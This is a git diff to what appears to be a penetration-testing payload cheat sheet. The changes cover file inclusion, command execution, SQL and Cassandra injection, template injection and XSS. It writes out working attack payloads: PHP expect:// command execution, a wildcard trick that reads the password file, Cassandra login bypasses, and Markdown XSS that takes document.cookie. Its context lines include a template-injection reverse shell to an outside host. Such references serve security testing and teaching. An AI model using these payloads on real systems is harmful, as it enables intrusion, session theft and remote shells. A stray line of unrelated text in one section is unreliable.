diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md index f5b936c0..4370e8a5 100644 --- a/File Inclusion - Path Traversal/README.md +++ b/File Inclusion - Path Traversal/README.md @@ -174,8 +174,8 @@ Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://ex ### Wrapper expect:// ```powershell -http://example.com/index.php?page=php:expect://id -http://example.com/index.php?page=php:expect://ls +http://example.com/index.php?page=expect://id +http://example.com/index.php?page=expect://ls ``` ### Wrapper input:// @@ -245,7 +245,7 @@ http://example.com/index.php?page=path/to/uploaded/file.png In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf ## LFI to RCE via upload (race) - +Worlds Quitest Let's Play" * Upload a file and trigger a self-inclusion. * Repeat 1 a shitload of time to: * increase our odds of winning the race diff --git a/PHP juggling type/README.md b/PHP juggling type/README.md index 6349f6d8..0a545868 100644 --- a/PHP juggling type/README.md +++ b/PHP juggling type/README.md @@ -1,6 +1,35 @@ # PHP Juggling type and magic hashes -## Exploit +## Type Juggling + +True statements + +```php +var_dump('0010e2' == '1e3'); # true +var_dump('0xABCdef' == ' 0xABCdef'); # true PHP 5.0 / false PHP 7.0 +var_dump('0xABCdef' == ' 0xABCdef'); # true PHP 5.0 / false PHP 7.0 +var_dump('0x01' == 1) # true PHP 5.0 / false PHP 7.0 +var_dump('0x1234Ab' == '1193131'); + +'123' == 123 +'123a' == 123 +'abc' == 0 + +'' == 0 == false == NULL +'' == 0 # true +0 == false # true +false == NULL # true +NULL == '' # true +``` + +NULL statements + +```php +var_dump(sha1([])); # NULL +var_dump(md5([])); # NULL +``` + +## Magic Hashes - Exploit ```php ``` diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md index 0ccdcedf..6e782682 100644 --- a/Remote commands execution/README.md +++ b/Remote commands execution/README.md @@ -102,6 +102,8 @@ who$@ami Bypass blacklisted word with variable expansion ```powershell +/???/??t /???/p??s?? + test=/ehhh/hmtc/pahhh/hmsswd cat ${test//hhh\/hm/} cat ${test//hh??hm/} diff --git a/SQL injection/Cassandra Injection.md b/SQL injection/Cassandra Injection.md new file mode 100644 index 00000000..1084ce38 --- /dev/null +++ b/SQL injection/Cassandra Injection.md @@ -0,0 +1,37 @@ +# Cassandra Injection + +> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system + +## Cassandra comment + +```sql +/* Cassandra Comment */ +``` + +## Cassandra - Login Bypass + +### Login Bypass 0 + +```sql +username: admin' ALLOW FILTERING; %00 +password: ANY +``` + +### Login Bypass 1 + +```sql +username: admin'/* +password: */and pass>' +``` + +The injection would look like the following SQL query + +```sql +SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING; +``` + +Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://hack2learn.pw/cassandra/login.php) + +## Thanks to + +* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/) \ No newline at end of file diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md index 79a70c69..88aaf929 100644 --- a/SQL injection/MySQL Injection.md +++ b/SQL injection/MySQL Injection.md @@ -1,6 +1,6 @@ # MYSQL Injection -## MySQL +## MySQL ```sql # MYSQL Comment diff --git a/SQL injection/README.md b/SQL injection/README.md index 595a7a05..63af6c21 100644 --- a/SQL injection/README.md +++ b/SQL injection/README.md @@ -1,6 +1,6 @@ # SQL injection -A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application +A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. ## Summary @@ -9,6 +9,7 @@ A SQL injection attack consists of insertion or "injection" of a SQL query via t * [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/OracleSQL%20Injection.md) * [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/PostgreSQL%20Injection.md) * [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/SQLite%20Injection.md) +* [CheatSheet Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/Cassandra%20Injection.md) * [Entry point detection](#entry-point-detection) * [DBMS Identification](#dbms-identification) * [SQL injection using SQLmap](#sql-injection-using-sqlmap) diff --git a/Server Side Template injections/README.md b/Server Side Template injections/README.md index e0e48993..7ce960f8 100644 --- a/Server Side Template injections/README.md +++ b/Server Side Template injections/README.md @@ -201,15 +201,21 @@ Inject this template {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host ``` -## AngularJS +## Client Side Template Injection -### AngularJS - Basic injection +### AngularJS ```javascript $eval('1+1') {{1+1}} ``` +### Vue JS + +```javascript +{{constructor.constructor('alert(1)')()}} +``` + ## Thanks to * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) diff --git a/Server Side Template injections/serverside.png b/Server Side Template injections/serverside.png new file mode 100644 index 00000000..4733bec1 Binary files /dev/null and b/Server Side Template injections/serverside.png differ diff --git a/XSS injection/README.md b/XSS injection/README.md index 4c6edb0f..06f14fd3 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -6,7 +6,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [Identify an XSS endpoint](#identify-an-xss-endpoint) - [XSS in HTML/Applications](#xss-in-htmlapplications) - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri) -- [XSS in files](#xss-in-files) +- [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files) - [Polyglot XSS](#polyglot-xss) - [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads) - [CSP Bypas](#csp-bypass) @@ -233,6 +233,15 @@ XSS in SVG (short) </title><script>alert(3)</script> ``` +XSS in Markdown + +```csharp +[a](javascript:prompt(document.cookie)) +[a](j a v a s c r i p t:prompt(document.cookie)) +[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) +[a](javascript:window.onerror=alert;throw%201) +``` + XSS in SWF flash application ```powershell @@ -693,6 +702,8 @@ Exotic payloads ## CSP Bypass +Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://blog.thomasorlita.cz/vulns/google-csp-evaluator/) + ### Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27)) //google.com/complete/search?client=chrome&jsonp=alert(1); diff --git a/XSS injection/XSS in Angular.md b/XSS injection/XSS in Angular.md index c627659e..89d73766 100644 --- a/XSS injection/XSS in Angular.md +++ b/XSS injection/XSS in Angular.md @@ -132,3 +132,9 @@ Angular 1.0.1 - 1.1.5 ```javascript {{constructor.constructor('alert(1)')()}} ``` + +Vue JS + +```javascript +{{constructor.constructor('alert(1)')()}} +``` \ No newline at end of file